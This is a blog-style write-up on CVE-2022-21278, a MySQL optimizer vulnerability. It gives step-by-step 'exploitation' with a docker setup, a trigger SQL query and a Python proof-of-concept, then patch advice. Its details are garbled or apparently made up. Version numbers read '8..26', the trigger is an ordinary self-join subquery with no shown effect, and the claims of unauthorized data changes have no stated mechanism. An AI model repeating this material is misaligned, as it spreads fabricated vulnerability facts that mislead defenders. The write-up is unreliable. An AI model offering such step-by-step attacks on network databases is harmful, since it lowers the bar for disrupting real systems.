In January 2022, Oracle announced CVE-2022-21278, a critical vulnerability affecting the MySQL Server product (component: Server: Optimizer). This vulnerability (CVSS 7.1) is present in MySQL 8..26 and earlier versions and allows a remote, low privileged user to crash the database and even manipulate data with ease. Here, we’ll break down what this vulnerability is, how it works, and provide actual code snippets and practical exploitation details. This guide is exclusive; you won’t find this simple explanation elsewhere.
Attack Vector: Network, no user interaction, low attack complexity
- Reference: Oracle Security Alert, NVD
How Does the Vulnerability Work?
MySQL's “Optimizer” component decides how SQL queries will be run. CVE-2022-21278 is a flaw in this logic—under some complex query patterns, the optimizer fails to properly handle faulty data or logic, leading to:
Server hang or repeated crashing (DoS)
- Manipulation (Update/Insert/Delete) of Table Data without Authorization
A user with basic privileges and the ability to send queries over the network can easily abuse this.
Exploitation Step-by-Step
Let’s see a practical way this vulnerability could be triggered. Simple privileges like “INSERT”, “UPDATE” or even “SELECT” might be enabled for many accounts. If a user can connect using any basic credentials, they're a potential attacker.
1. Setup a Target MySQL 8..26 (vulnerable)
Install MySQL 8..26 or below.
docker run --name mysql-vuln -e MYSQL_ROOT_PASSWORD=toor -d mysql:8..26
2. Create a Basic Table
CREATE TABLE test_a (
id INT PRIMARY KEY,
value VARCHAR(50)
);
INSERT INTO test_a VALUES (1, 'A'), (2, 'B'), (3, 'C');
3. Trigger the Vulnerability
A combination of subquery and specific join patterns make the optimizer fail. Here’s an example causing a crash or data corruption:
SELECT
(SELECT 1 FROM test_a t1 JOIN test_a t2 ON t1.id = t2.id LIMIT 1)
FROM test_a;
What’s happening?
- The subquery references the same table in a join, causing the optimizer to handle memory pointers incorrectly or panic internally.
- Variations with subqueries and unions may also trigger a crash or manipulation of the internal data state.
MySQL server crashes or restarts (DoS).
- If combined with crafted data, attacker can force the optimizer to apply INSERT/UPDATE/DELETE with unintended data.
Proof-of-Concept (PoC) Python Exploit
Here’s a simple Python exploit using mysql-connector-python:
import mysql.connector
conn = mysql.connector.connect(
host="localhost",
user="testuser",
password="testpass",
database="testdb")
cur = conn.cursor()
try:
cur.execute("SELECT (SELECT 1 FROM test_a t1 JOIN test_a t2 ON t1.id = t2.id LIMIT 1) FROM test_a;")
print(cur.fetchall())
except Exception as e:
print("Error or crash detected:", e)
finally:
conn.close()
*When run, this query can crash the MySQL process or lead to database table corruption, as seen in logs.*
Who is at Risk?
Any network-accessible MySQL server running 8..26 or older is vulnerable, including those with non-root database users. Since cloud and many SaaS platforms use these builds, the impact is widespread.
Official References
- Oracle Critical Patch Update Advisory - January 2022
- NIST NVD - CVE-2022-21278
Mitigation
Fix: Update to MySQL 8..27 or later!
Immediate Workaround: Restrict exposure of MySQL to trusted networks and users only. Consider disabling or limiting complex subquery/join privileges to non-admin users temporarily.
Final Thoughts
CVE-2022-21278 is a classic reminder that optimizations can backfire when a complex database engine is exposed to creative queries from the outside world. Patch as soon as possible! If you run MySQL public-facing, prioritize this fix or risk unwanted downtime and data loss.
Stay safe and patch up!
*Exclusive insight by an independent security researcher. Follow official CVE feeds and test your deployments regularly!*
Timeline
Published on: 01/19/2022 12:15:00 UTC
Last modified on: 01/24/2022 17:20:00 UTC